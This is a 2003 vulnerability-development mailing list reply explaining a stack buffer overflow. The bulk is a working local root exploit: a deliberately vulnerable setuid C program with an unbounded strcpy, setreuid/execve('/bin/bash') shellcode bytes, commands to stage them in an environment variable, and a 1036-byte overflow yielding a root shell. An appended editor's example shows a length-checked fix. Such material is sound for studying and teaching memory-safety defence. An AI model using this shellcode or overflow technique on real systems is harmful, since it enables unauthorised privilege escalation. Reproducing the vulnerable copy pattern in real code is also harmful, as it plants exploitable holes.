Vulnerability Development mailing list archives

Re: controlling ebp/eip of a frame, does it always lead to possible code execution?


From: Steven Hill <steve () covertsystems org>
Date: Fri, 19 Sep 2003 16:00:12 +1000 (EST)


On Thu, 18 Sep 2003, Ingram wrote:

Hello,

Again I have a little question about buffer overflows
that I could not figure out by myself.

If I can control what is written to ebp and eip, I thought
that this would always be enough to execute shellcode,
...it seems not:

./exploit
Segmentation fault (core dumped)
gdb ./myprog ./myprog.core


Ingram,

        Try these sample exploit command-line statements,
        as they should help you better understand what you
        are trying to achieve; then, if you prefer, browse
        over the attached exploit code.

[steve@covertsystems research]#cat > vuln.c << EOF
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
        char buffer[1024];

        /* Unbounded copy: an argv[1] longer than 1023 bytes runs past
         * buffer into the padding, the saved EBP and the return address. */
        if(argc > 1)
                strcpy(buffer, argv[1]);

        return EXIT_SUCCESS;
}
EOF
[steve@covertsystems research]#cat > shell2string.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen() */

char shell[] =
        //setreuid(0, 0);
        "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"

        //execve("/bin/bash", NULL)
        "\x31\xc0\x50\x6a\x68\x68\x2f\x62\x61\x73"
        "\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"
        "\x0c\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"

        //exit(0);
        "\x31\xc0\xb0\x01\xcd\x80";

/* Write the raw shellcode bytes to shell.txt so they can be put in
 * an environment variable with `export CODE=\`cat shell.txt\``. */
int main(void)  {

        FILE *fp;
        size_t x;

        fp = fopen("shell.txt", "wb");
        if(fp == NULL) {
                perror("fopen");
                return EXIT_FAILURE;
        }
        for(x = 0; x < strlen(shell); x++)
                fprintf(fp, "%c", shell[x]);
        fclose(fp);
        return EXIT_SUCCESS;
}
EOF
[steve@covertsystems research]$ gcc shell2string.c
[steve@covertsystems research]$ ./a.out
[steve@covertsystems research]$ ls -l shell.txt ; wc -c shell.txt
-rw-rw-r--    1 steve    steve          48 Aug  7 18:32 shell.txt
     48 shell.txt
[steve@covertsystems research]$ od -ch shell.txt
0000000   1 300 260   F   1 333   1 311 315 200   1 300   P   j   h   h
        c031 46b0 db31 c931 80cd c031 6a50 6868
0000020   /   b   a   s   h   /   b   i   n 211 343 215   T   $  \f   P
        622f 7361 2f68 6962 896e 8de3 2454 500c
0000040   S 215  \f   $ 260  \v 315 200   x   3   1 300 260 001 315 200
        8d53 240c 0bb0 80cd 3378 c031 01b0 80cd
0000060
[steve@covertsystems research]# sudo gcc vuln.c -o vuln
[steve@covertsystems research]# sudo chown root.root vuln
[steve@covertsystems research]# sudo chmod 4755 vuln
[steve@covertsystems research]# ls -l vuln
-rwsr-xr-x    1 root     root        11549 Aug  7 18:30 vuln
[steve@covertsystems research]$ export CODE=`cat shell.txt `
[steve@covertsystems research]$ echo 'main(){printf("%p\n",getenv("CODE"));}'>
code.c ; gcc code.c -o code ; ./code ; rm -rf code*
0xbfffff84
[steve@covertsystems research]$ ./vuln `perl -e '{print "A" x 1036}';``printf 
"\x84\xff\xff\xbf";`
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[root@covertsystems research]# id
uid=0(root) gid=500(steve) groups=500(steve)
[root@covertsystems research]#

Happy Hacking!...

1036 == 1024 [buffer] + 8 [padding] + 4 [EBP] + 4 [EIP]
EIP shall point directly to the shellcode ENV address...


[steve@covertsystems research-1]$ gcc --version
gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)


-- 

 ---=[ Covert Systems Research ]=-----------------------------//
 = www.covertsystems.org                                      -
 = Exploit Research & Development                             -
 = Specializing in Linux & UNIX Systems                       -
 --------------------------------------------=[ SolarIce ]=---//

 --The more one reads & learns, the less the other person knows.
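Editor's added example, not part of Steve's post or attachments: the same vuln.c main(), with the unbounded strcpy() replaced by a length-checked copy so that an oversized argv[1] is rejected instead of reaching the saved EBP and return address. The helper names copy_arg() and padded_arg_fits() are mine.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define BUFSZ 1024

/* Copy src into dst only if it fits, NUL terminator included.
 * Returns 0 on success and -1 if src is too long; dst is left untouched on
 * failure. In vuln.c the 1024-byte buffer, 8 bytes of padding, the saved EBP
 * and the return address are contiguous, so a 1036-byte argument overwrites
 * all of them; this check stops the copy before the first byte lands. */
int copy_arg(char *dst, size_t dstsz, const char *src)
{
        size_t n = strlen(src);
        if (n >= dstsz)
                return -1;
        memcpy(dst, src, n + 1);
        return 0;
}

/* Build a string of n 'A's (like the perl one-liner in the post) and report
 * whether it would be accepted for a BUFSZ buffer: 1 = fits, 0 = rejected,
 * -1 = allocation failure. Used only to exercise copy_arg(). */
int padded_arg_fits(size_t n)
{
        char tmp[BUFSZ];
        char *s = malloc(n + 1);
        int ok;

        if (s == NULL)
                return -1;
        memset(s, 'A', n);
        s[n] = '\0';
        ok = (copy_arg(tmp, sizeof tmp, s) == 0);
        free(s);
        return ok;
}

int main(int argc, char **argv)
{
        char buffer[BUFSZ];

        if (argc > 1 && copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
                fprintf(stderr, "argument too long (max %d bytes)\n", BUFSZ - 1);
                return EXIT_FAILURE;
        }
        return EXIT_SUCCESS;
}
```

Compiling with gcc's -fstack-protector adds a canary between the buffer and the saved EBP as a second line of defence, but the length check above is what removes the bug itself.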


Attachments: shell2string.c, vuln-1.c, exploit-1-1.c